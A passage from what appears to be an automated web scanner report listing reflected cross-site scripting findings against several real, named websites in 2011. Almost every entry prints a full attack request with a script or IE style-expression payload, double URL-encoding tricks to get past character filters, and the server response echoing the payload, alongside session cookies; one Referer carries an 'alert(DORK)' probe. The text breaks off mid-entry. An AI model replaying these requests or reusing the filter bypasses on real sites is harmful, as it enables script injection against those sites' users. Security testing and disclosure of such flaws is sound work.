<strong> http://www.androidtapp.com/wp-content/plugins/wp-postratings9dfa9<script>alert(1)</script>8fc76e0ba66/postratings-js.js?ver=1.50 </strong>
...[SNIP]...

2.69. http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/plugins/wp-postratings/postratings-js.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5920<script>alert(1)</script>3a1fd1c46c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/wp-postratings/postratings-js.jsd5920<script>alert(1)</script>3a1fd1c46c0?ver=1.50 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:11 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/plugins/wp-postratings/postratings-js.jsd5920<script>alert(1)</script>3a1fd1c46c0?ver=1.50 </strong>
...[SNIP]...

2.70. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89904<script>alert(1)</script>cf6980bae05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content89904<script>alert(1)</script>cf6980bae05/themes/AndroidTappv3/favicon.ico HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:16:40 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:16:40 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:16:40 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: dd4e1e5189f7d24b8a1efc32236f52a6
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content89904<script>alert(1)</script>cf6980bae05/themes/AndroidTappv3/favicon.ico </strong>
...[SNIP]...

2.71. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 683ba<script>alert(1)</script>21824087c86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes683ba<script>alert(1)</script>21824087c86/AndroidTappv3/favicon.ico HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:16:59 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:16:59 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:16:59 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 36dd09b715c1eefd82c01bd628567586
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/themes683ba<script>alert(1)</script>21824087c86/AndroidTappv3/favicon.ico </strong>
...[SNIP]...

2.72. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c5114<script>alert(1)</script>a047f7fb5cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/AndroidTappv3c5114<script>alert(1)</script>a047f7fb5cd/favicon.ico HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:17:28 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:17:28 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:17:28 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 7c49d5b1c78130d3483e8bbf6f032964
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/themes/AndroidTappv3c5114<script>alert(1)</script>a047f7fb5cd/favicon.ico </strong>
...[SNIP]...

2.73. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-content/themes/AndroidTappv3/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ad5e3<script>alert(1)</script>34d787bfa65 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/AndroidTappv3/favicon.icoad5e3<script>alert(1)</script>34d787bfa65 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:17:39 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:17:39 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:17:39 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 30ab6cbf9904a435a453766c8d6230bb
Vary: User-Agent
Content-Length: 55420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.icoad5e3<script>alert(1)</script>34d787bfa65 </strong>
...[SNIP]...

2.74. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload de962<script>alert(1)</script>2c358430fe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesde962<script>alert(1)</script>2c358430fe4/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:39 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includesde962<script>alert(1)</script>2c358430fe4/js/jquery/jquery.js?ver=1.4.2 </strong>
...[SNIP]...

2.75. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11d62<script>alert(1)</script>38a46498964 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js11d62<script>alert(1)</script>38a46498964/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:56 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includes/js11d62<script>alert(1)</script>38a46498964/jquery/jquery.js?ver=1.4.2 </strong>
...[SNIP]...

2.76. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d4bf8<script>alert(1)</script>90010bbd65f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryd4bf8<script>alert(1)</script>90010bbd65f/jquery.js?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:18 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includes/js/jqueryd4bf8<script>alert(1)</script>90010bbd65f/jquery.js?ver=1.4.2 </strong>
...[SNIP]...

2.77. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5873b<script>alert(1)</script>f3b26b81f90 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.js5873b<script>alert(1)</script>f3b26b81f90?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:36 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includes/js/jquery/jquery.js5873b<script>alert(1)</script>f3b26b81f90?ver=1.4.2 </strong>
...[SNIP]...

2.78. http://www.androidtapp.com/wp-login.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-login.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b764<script>alert(1)</script>923e80a7fe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-login.php9b764<script>alert(1)</script>923e80a7fe9 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:32 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 59859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<strong> http://www.androidtapp.com/wp-login.php9b764<script>alert(1)</script>923e80a7fe9
</strong>
...[SNIP]...

2.79. http://www.autobytel.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3b1c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252214f4c67906f was submitted in the REST URL parameter 1. This input was echoed as a3b1c"style="x:expression(alert(1))"14f4c67906f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icoa3b1c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252214f4c67906f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autobytel.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 21068
Vary: Accept-Encoding
Expires: Fri, 01 Apr 2011 15:44:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 15:44:30 GMT
Connection: close
Set-Cookie: cweb=JONQJVS10.4.128.188CKMMJ; path=/
Set-Cookie: USER_UUID_VCH=B1598B1E%2DB431%2DED31%2DDDF297B3771F1069;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D04%2D01%2008%3A43%3A30%27%7D;path=/
Set-Cookie: COUNT=1;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D04%2D01%2012%3A44%3A30%27%7D;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: --> <!-- Referer: None --> <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/favicon.icoa3b1c"style="x:expression(alert(1))"14f4c67906f/">
...[SNIP]...

2.80. http://www.beatthetraffic.com/widgets/traveltimes.aspx [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beatthetraffic.com
Path:   /widgets/traveltimes.aspx

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e2"style%3d"x%3aexpression(alert(1))"46455cc9323 was submitted in the partner parameter. This input was echoed as 4e8e2"style="x:expression(alert(1))"46455cc9323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork4e8e2"style%3d"x%3aexpression(alert(1))"46455cc9323&inrix=1&items=3&link=&code=0&ts=4&rc=false HTTP/1.1
Host: www.beatthetraffic.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=904
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 9702
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
p3p: CP="CAO CONi ONL OUR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=51oeeyvyrlq5wommjsu3cvem; path=/; HttpOnly
Date: Fri, 01 Apr 2011 18:11:28 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>Beat the Traffic - Drive Times</title>
       <LINK
...[SNIP]...
<link href="/css/TWC_NewYork4e8e2"style="x:expression(alert(1))"46455cc9323.css" type="text/css" rel="stylesheet">
...[SNIP]...

2.81. http://www.cambridge.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cambridge.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e was submitted in the REST URL parameter 1. This input was echoed as 41430<script>alert(1)</script>96756d9915e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cambridge.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:20:01 GMT
Content-Length: 7320
Connection: close
Set-Cookie: ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; path=/
Set-Cookie: X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>favicon.ico41430<script>alert(1)</script>96756d9915e</b>
...[SNIP]...

2.82. http://www.cambridge.org/uk/404_error.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
